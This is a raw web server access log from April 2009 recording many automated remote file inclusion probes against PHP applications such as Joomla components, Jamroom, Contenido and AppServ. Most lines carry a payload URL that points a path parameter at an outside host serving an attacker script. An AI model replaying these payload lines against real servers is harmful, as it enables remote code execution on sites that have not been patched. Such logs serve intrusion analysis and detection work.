88.191.89.65 - - [15/Apr/2009:13:56:52 -0500] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
88.191.89.65 - - [15/Apr/2009:13:56:52 -0500] "GET /logs/access_log.1228608000//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
76.74.159.200 - - [15/Apr/2009:13:57:19 -0500] "GET //snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.the-flight.net///bbs/data/hyper_gallery/id1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
76.74.159.200 - - [15/Apr/2009:13:57:19 -0500] "GET /logs//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.the-flight.net///bbs/data/hyper_gallery/id1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
76.74.159.200 - - [15/Apr/2009:13:57:19 -0500] "GET /logs/access_log.1235779200//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.the-flight.net///bbs/data/hyper_gallery/id1.txt? HTTP/1.1" 404 356 "-""Mozilla/5.0"
76.74.159.200 - - [15/Apr/2009:13:57:25 -0500] "GET /logs/access_log.1236211200//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.the-flight.net///bbs/data/hyper_gallery/id1.txt? HTTP/1.1" 404 356 "-""Mozilla/5.0"
218.246.20.221 - - [15/Apr/2009:13:57:44 -0500] "GET //config/dbutil.bck.php?confdir=http://www.tos-belarus.org/scan/copyright.txt??? HTTP/1.1" 404 305 "-""Mozilla/5.0"
218.246.20.221 - - [15/Apr/2009:13:57:44 -0500] "GET /logs/access_log.1236038400//config/dbutil.bck.php?confdir=http://www.tos-belarus.org/scan/copyright.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
218.246.20.221 - - [15/Apr/2009:13:57:44 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://www.tos-belarus.org/scan/copyright.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
218.246.20.221 - - [15/Apr/2009:13:57:50 -0500] "GET /logs/access_log.1233619200//config/dbutil.bck.php?confdir=http://www.tos-belarus.org/scan/copyright.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
210.118.171.47 - - [15/Apr/2009:13:58:52 -0500] "GET /logs/access_log.1228608000//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
210.118.171.47 - - [15/Apr/2009:13:58:52 -0500] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
210.118.171.47 - - [15/Apr/2009:13:58:52 -0500] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
76.74.159.200 - - [15/Apr/2009:13:59:54 -0500] "GET //snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.the-flight.net///bbs/data/hyper_gallery/id1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
76.74.159.200 - - [15/Apr/2009:13:59:54 -0500] "GET /logs//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.the-flight.net///bbs/data/hyper_gallery/id1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
76.74.159.200 - - [15/Apr/2009:13:59:54 -0500] "GET /logs/access_log.1235779200//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.the-flight.net///bbs/data/hyper_gallery/id1.txt? HTTP/1.1" 404 356 "-""Mozilla/5.0"
76.74.159.200 - - [15/Apr/2009:13:59:54 -0500] "GET /logs/access_log.1236211200//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.the-flight.net///bbs/data/hyper_gallery/id1.txt? HTTP/1.1" 404 356 "-""Mozilla/5.0"
218.246.20.221 - - [15/Apr/2009:14:03:07 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://www.tos-belarus.org/scan/copyright.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
218.246.20.221 - - [15/Apr/2009:14:03:07 -0500] "GET //config/dbutil.bck.php?confdir=http://www.tos-belarus.org/scan/copyright.txt??? HTTP/1.1" 404 305 "-""Mozilla/5.0"
218.246.20.221 - - [15/Apr/2009:14:03:07 -0500] "GET /logs/access_log.1236038400//config/dbutil.bck.php?confdir=http://www.tos-belarus.org/scan/copyright.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
218.246.20.221 - - [15/Apr/2009:14:03:07 -0500] "GET /logs/access_log.1233619200//config/dbutil.bck.php?confdir=http://www.tos-belarus.org/scan/copyright.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
80.67.5.4 - - [15/Apr/2009:14:06:12 -0500] "GET //convert/mvcw.php?step=1&vwar_root=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
80.67.5.4 - - [15/Apr/2009:14:06:12 -0500] "GET /logs//convert/mvcw.php?step=1&vwar_root=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
218.185.20.88 - - [15/Apr/2009:14:07:30 -0500] "GET /logs/access_log.1236211200//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.the-flight.net///bbs/data/hyper_gallery/id1.txt? HTTP/1.1" 404 356 "-""Mozilla/5.0"
218.185.20.88 - - [15/Apr/2009:14:07:30 -0500] "GET /logs//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.the-flight.net///bbs/data/hyper_gallery/id1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
218.185.20.88 - - [15/Apr/2009:14:07:30 -0500] "GET /logs/access_log.1235779200//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.the-flight.net///bbs/data/hyper_gallery/id1.txt? HTTP/1.1" 404 356 "-""Mozilla/5.0"
218.185.20.88 - - [15/Apr/2009:14:07:30 -0500] "GET //snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.the-flight.net///bbs/data/hyper_gallery/id1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
218.185.20.88 - - [15/Apr/2009:14:08:00 -0500] "GET //snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.the-flight.net///bbs/data/hyper_gallery/id1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
218.185.20.88 - - [15/Apr/2009:14:08:00 -0500] "GET /logs//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.the-flight.net///bbs/data/hyper_gallery/id1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
218.185.20.88 - - [15/Apr/2009:14:08:00 -0500] "GET /logs/access_log.1235779200//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.the-flight.net///bbs/data/hyper_gallery/id1.txt? HTTP/1.1" 404 356 "-""Mozilla/5.0"
218.185.20.88 - - [15/Apr/2009:14:08:00 -0500] "GET /logs/access_log.1236211200//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.the-flight.net///bbs/data/hyper_gallery/id1.txt? HTTP/1.1" 404 356 "-""Mozilla/5.0"
200.93.147.154 - - [15/Apr/2009:14:08:38 -0500] "GET //snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.geocities.com/wuriharu/test.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
65.98.212.100 - - [15/Apr/2009:14:10:28 -0500] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.bluebrad.com/idx33xid.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.79"
65.98.212.100 - - [15/Apr/2009:14:10:28 -0500] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.bluebrad.com/idx33xid.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.79"
88.191.89.65 - - [15/Apr/2009:14:10:42 -0500] "GET /logs/access_log.1232409600//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
70.38.31.50 - - [15/Apr/2009:14:11:50 -0500] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.bluebrad.com/idx33xid.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
70.38.31.50 - - [15/Apr/2009:14:11:50 -0500] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.ptps.cyc.edu.tw/appserv/argest.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
70.38.31.50 - - [15/Apr/2009:14:11:50 -0500] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.ptps.cyc.edu.tw/appserv/argest.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
70.38.31.50 - - [15/Apr/2009:14:11:50 -0500] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.bluebrad.com/idx33xid.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
195.155.232.37 - - [15/Apr/2009:14:16:14 -0500] "GET //?path%5Bdocroot%5D=http://www.shipdesign.co.kr/id????? HTTP/1.1" 200 3245 "-""libwww-perl/5.79"
195.155.232.37 - - [15/Apr/2009:14:16:20 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.shipdesign.co.kr/id????? HTTP/1.1" 200 185632 "-""libwww-perl/5.79"
202.153.128.112 - - [15/Apr/2009:14:27:57 -0500] "GET /logs/index.php?themesdir=http://geocities.com/jendral.black/shell/fatal.txt? HTTP/1.1" 404 297 "-""libwww-perl/5.814"
202.153.128.112 - - [15/Apr/2009:14:27:58 -0500] "GET /index.php?themesdir=http://geocities.com/jendral.black/shell/fatal.txt? HTTP/1.1" 404 292 "-""libwww-perl/5.814"
67.205.102.239 - - [15/Apr/2009:14:30:11 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.fuscaclubedealagoas.com.br/vnc/albania.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.813"
67.205.102.239 - - [15/Apr/2009:14:30:11 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.fuscaclubedealagoas.com.br/vnc/albania.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.813"
67.205.102.239 - - [15/Apr/2009:14:30:11 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.fuscaclubedealagoas.com.br/vnc/albania.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.813"
67.205.102.239 - - [15/Apr/2009:14:30:11 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.fuscaclubedealagoas.com.br/vnc/albania.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.813"
72.232.173.194 - - [15/Apr/2009:14:30:49 -0500] "GET /logs/access_log.1228262400 HTTP/1.0" 200 12042 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
77.232.68.137 - - [15/Apr/2009:14:31:06 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://hacker94.freehostia.com/safe.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.810"
77.232.68.137 - - [15/Apr/2009:14:31:06 -0500] "GET //Neos_Chronos/header.php?base_folder=http://hacker94.freehostia.com/safe.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.810"
202.165.244.10 - - [15/Apr/2009:14:32:00 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.fuscaclubedealagoas.com.br/vnc/albania.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.79"
202.165.244.10 - - [15/Apr/2009:14:32:01 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.fuscaclubedealagoas.com.br/vnc/albania.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
202.165.244.10 - - [15/Apr/2009:14:32:10 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.fuscaclubedealagoas.com.br/vnc/albania.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.79"
202.165.244.10 - - [15/Apr/2009:14:32:10 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.fuscaclubedealagoas.com.br/vnc/albania.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
77.232.68.137 - - [15/Apr/2009:14:33:25 -0500] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://hacker94.freehostia.com/safe.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.810"
77.232.68.137 - - [15/Apr/2009:14:33:25 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://hacker94.freehostia.com/safe.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.810"
67.205.102.239 - - [15/Apr/2009:14:39:14 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.fuscaclubedealagoas.com.br/vnc/albania.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.813"
67.205.102.239 - - [15/Apr/2009:14:39:14 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.fuscaclubedealagoas.com.br/vnc/albania.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.813"
67.205.102.239 - - [15/Apr/2009:14:39:14 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.fuscaclubedealagoas.com.br/vnc/albania.txt?? HTTP/1.1" 404 337 "-""libwww-perl/5.813"
67.205.102.239 - - [15/Apr/2009:14:39:14 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.fuscaclubedealagoas.com.br/vnc/albania.txt?? HTTP/1.1" 404 337 "-""libwww-perl/5.813"
200.160.96.54 - - [15/Apr/2009:14:46:37 -0500] "GET /logs/main.php?pagina=http://www.fuscaclubedealagoas.com.br/vnc/albania.txt???? HTTP/1.0" 404 284 "-""libwww-perl/5.808"
200.160.96.54 - - [15/Apr/2009:14:46:38 -0500] "GET /main.php?pagina=http://www.fuscaclubedealagoas.com.br/vnc/albania.txt???? HTTP/1.0" 404 279 "-""libwww-perl/5.808"
202.165.244.10 - - [15/Apr/2009:14:49:25 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.fuscaclubedealagoas.com.br/vnc/albania.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.79"
202.165.244.10 - - [15/Apr/2009:14:49:26 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.fuscaclubedealagoas.com.br/vnc/albania.txt?? HTTP/1.1" 404 337 "-""libwww-perl/5.79"
202.165.244.10 - - [15/Apr/2009:14:49:45 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.fuscaclubedealagoas.com.br/vnc/albania.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.79"
202.165.244.10 - - [15/Apr/2009:14:49:46 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.fuscaclubedealagoas.com.br/vnc/albania.txt?? HTTP/1.1" 404 337 "-""libwww-perl/5.79"
216.104.37.122 - - [15/Apr/2009:14:57:03 -0500] "GET /logs/appserv/main.php?appserv_root=http://rubii.t35.com/pit-id.txt? HTTP/1.1" 404 304 "-""libwww-perl/5.825"
216.104.37.122 - - [15/Apr/2009:14:57:03 -0500] "GET /appserv/main.php?appserv_root=http://rubii.t35.com/pit-id.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.825"
168.143.19.89 - - [15/Apr/2009:15:00:07 -0500] "GET /logs/appserv/main.php?appserv_root=http://www.discountbodybuildingsupplementsstore.com/id.txt.1?? HTTP/1.1" 404 304 "-""libwww-perl/5.825"
168.143.19.89 - - [15/Apr/2009:15:00:07 -0500] "GET /appserv/main.php?appserv_root=http://www.discountbodybuildingsupplementsstore.com/id.txt.1?? HTTP/1.1" 404 299 "-""libwww-perl/5.825"
168.143.19.89 - - [15/Apr/2009:15:00:09 -0500] "GET /logs/appserv/main.php?appserv_root=http://envolverde.ig.com.br/parceiros/id.txt?? HTTP/1.1" 404 304 "-""libwww-perl/5.825"
168.143.19.89 - - [15/Apr/2009:15:00:09 -0500] "GET /logs/appserv/main.php?appserv_root=http://www.discountbodybuildingsupplementsstore.com/id.txt.1?? HTTP/1.1" 404 304 "-""libwww-perl/5.825"
168.143.19.89 - - [15/Apr/2009:15:00:09 -0500] "GET /appserv/main.php?appserv_root=http://envolverde.ig.com.br/parceiros/id.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.825"
168.143.19.89 - - [15/Apr/2009:15:00:09 -0500] "GET /appserv/main.php?appserv_root=http://www.discountbodybuildingsupplementsstore.com/id.txt.1?? HTTP/1.1" 404 299 "-""libwww-perl/5.825"
77.221.130.18 - - [15/Apr/2009:15:10:45 -0500] "GET /logs/access_log.1238112000//manager/frontinc/prepend.php?_PX_config[manager_path]=http://www.the-flight.net///bbs/data/hyper_gallery/id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
77.221.130.18 - - [15/Apr/2009:15:10:45 -0500] "GET //manager/frontinc/prepend.php?_PX_config[manager_path]=http://www.the-flight.net///bbs/data/hyper_gallery/id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
77.221.130.18 - - [15/Apr/2009:15:10:45 -0500] "GET /logs//manager/frontinc/prepend.php?_PX_config[manager_path]=http://www.the-flight.net///bbs/data/hyper_gallery/id1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
77.221.130.18 - - [15/Apr/2009:15:10:59 -0500] "GET /logs//manager/frontinc/prepend.php?_PX_config[manager_path]=http://www.the-flight.net///bbs/data/hyper_gallery/id1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
77.221.130.18 - - [15/Apr/2009:15:10:59 -0500] "GET //manager/frontinc/prepend.php?_PX_config[manager_path]=http://www.the-flight.net///bbs/data/hyper_gallery/id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
77.221.130.18 - - [15/Apr/2009:15:10:59 -0500] "GET /logs/access_log.1238112000//manager/frontinc/prepend.php?_PX_config[manager_path]=http://www.the-flight.net///bbs/data/hyper_gallery/id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
89.188.112.132 - - [15/Apr/2009:15:11:48 -0500] "GET //manager/frontinc/prepend.php?_PX_config[manager_path]=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
89.188.112.132 - - [15/Apr/2009:15:11:48 -0500] "GET /logs/access_log.1238112000//manager/frontinc/prepend.php?_PX_config[manager_path]=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
89.188.112.132 - - [15/Apr/2009:15:11:49 -0500] "GET /logs//manager/frontinc/prepend.php?_PX_config[manager_path]=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
89.188.112.132 - - [15/Apr/2009:15:11:53 -0500] "GET /logs/access_log.1238112000//manager/frontinc/prepend.php?_PX_config[manager_path]=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
89.188.112.132 - - [15/Apr/2009:15:11:53 -0500] "GET //manager/frontinc/prepend.php?_PX_config[manager_path]=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
89.188.112.132 - - [15/Apr/2009:15:11:53 -0500] "GET /logs//manager/frontinc/prepend.php?_PX_config[manager_path]=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
66.7.216.240 - - [15/Apr/2009:15:11:53 -0500] "GET /logs//manager/frontinc/prepend.php?_PX_config[manager_path]=http://www.the-flight.net///bbs/data/hyper_gallery/id1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
66.7.216.240 - - [15/Apr/2009:15:11:53 -0500] "GET //manager/frontinc/prepend.php?_PX_config[manager_path]=http://www.the-flight.net///bbs/data/hyper_gallery/id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
66.7.216.240 - - [15/Apr/2009:15:11:53 -0500] "GET /logs/access_log.1238112000//manager/frontinc/prepend.php?_PX_config[manager_path]=http://www.the-flight.net///bbs/data/hyper_gallery/id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
89.188.112.132 - - [15/Apr/2009:15:12:27 -0500] "GET //manager/frontinc/prepend.php?_PX_config[manager_path]=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
89.188.112.132 - - [15/Apr/2009:15:12:27 -0500] "GET /logs//manager/frontinc/prepend.php?_PX_config[manager_path]=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
89.188.112.132 - - [15/Apr/2009:15:12:27 -0500] "GET /logs/access_log.1238112000//manager/frontinc/prepend.php?_PX_config[manager_path]=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
207.57.79.26 - - [15/Apr/2009:15:12:39 -0500] "GET /logs/access_log.1236729600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.katrinkurven.dk//plugins/search/id1.txt? HTTP/1.1" 404 361 "-""Mozilla/5.0"
207.57.79.26 - - [15/Apr/2009:15:12:39 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.katrinkurven.dk//plugins/search/id1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
207.57.79.26 - - [15/Apr/2009:15:12:39 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.katrinkurven.dk//plugins/search/id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
69.73.140.200 - - [15/Apr/2009:15:12:56 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.katrinkurven.dk//plugins/search/id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
69.73.140.200 - - [15/Apr/2009:15:12:56 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.katrinkurven.dk//plugins/search/id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
69.73.140.200 - - [15/Apr/2009:15:12:56 -0500] "GET /logs/access_log.1236729600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.katrinkurven.dk//plugins/search/id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
77.221.130.18 - - [15/Apr/2009:15:13:03 -0500] "GET /logs//manager/frontinc/prepend.php?_PX_config[manager_path]=http://www.the-flight.net///bbs/data/hyper_gallery/id1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
77.221.130.18 - - [15/Apr/2009:15:13:03 -0500] "GET //manager/frontinc/prepend.php?_PX_config[manager_path]=http://www.the-flight.net///bbs/data/hyper_gallery/id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
77.221.130.18 - - [15/Apr/2009:15:13:03 -0500] "GET /logs/access_log.1238112000//manager/frontinc/prepend.php?_PX_config[manager_path]=http://www.the-flight.net///bbs/data/hyper_gallery/id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
69.73.140.200 - - [15/Apr/2009:15:13:25 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.katrinkurven.dk//plugins/search/id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
69.73.140.200 - - [15/Apr/2009:15:13:25 -0500] "GET /logs/access_log.1236729600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.katrinkurven.dk//plugins/search/id1.txt? HTTP/1.1" 404 361 "-""Mozilla/5.0"
69.73.140.200 - - [15/Apr/2009:15:13:25 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.katrinkurven.dk//plugins/search/id1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
195.189.226.5 - - [15/Apr/2009:15:15:29 -0500] "GET /logs/access_log.1236729600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.katrinkurven.dk//plugins/search/id1.txt? HTTP/1.1" 404 361 "-""Mozilla/5.0"
195.189.226.5 - - [15/Apr/2009:15:15:29 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.katrinkurven.dk//plugins/search/id1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
195.189.226.5 - - [15/Apr/2009:15:15:29 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.katrinkurven.dk//plugins/search/id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
202.153.128.112 - - [15/Apr/2009:15:21:38 -0500] "GET /logs/login.php?dir=http://geocities.com/jendral.black/shell/fatal.txt? HTTP/1.1" 404 297 "-""libwww-perl/5.814"
202.153.128.112 - - [15/Apr/2009:15:21:39 -0500] "GET /login.php?dir=http://geocities.com/jendral.black/shell/fatal.txt? HTTP/1.1" 404 292 "-""libwww-perl/5.814"
76.74.159.200 - - [15/Apr/2009:15:29:54 -0500] "GET //xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.the-flight.net///bbs/data/hyper_gallery/id1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
76.74.159.200 - - [15/Apr/2009:15:29:54 -0500] "GET /logs/access_log.1236816000//xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.the-flight.net///bbs/data/hyper_gallery/id1.txt? HTTP/1.1" 404 341 "-""Mozilla/5.0"
76.74.159.200 - - [15/Apr/2009:15:29:54 -0500] "GET /logs//xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.the-flight.net///bbs/data/hyper_gallery/id1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
211.189.26.116 - - [15/Apr/2009:15:30:54 -0500] "GET /?_zb_path=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
211.189.26.116 - - [15/Apr/2009:15:30:54 -0500] "GET /logs/access_log.1230940800/?_zb_path=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
211.189.26.116 - - [15/Apr/2009:15:30:56 -0500] "GET /logs/?_zb_path=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 200 185627 "-""Mozilla/5.0"
210.118.194.225 - - [15/Apr/2009:15:31:24 -0500] "GET /logs/access_log.1230940800/?_zb_path=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
210.118.194.225 - - [15/Apr/2009:15:31:24 -0500] "GET /?_zb_path=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
210.118.194.225 - - [15/Apr/2009:15:31:25 -0500] "GET /logs/?_zb_path=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 200 185627 "-""Mozilla/5.0"
211.189.26.116 - - [15/Apr/2009:15:31:36 -0500] "GET /logs/access_log.1237248000/?_zb_path=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
210.118.194.225 - - [15/Apr/2009:15:31:53 -0500] "GET /logs/access_log.1237248000/?_zb_path=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
202.111.175.179 - - [15/Apr/2009:15:34:37 -0500] "GET /?_zb_path=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
202.111.175.179 - - [15/Apr/2009:15:34:37 -0500] "GET /logs/access_log.1230940800/?_zb_path=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
202.111.175.179 - - [15/Apr/2009:15:34:40 -0500] "GET /logs/?_zb_path=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 200 185627 "-""Mozilla/5.0"
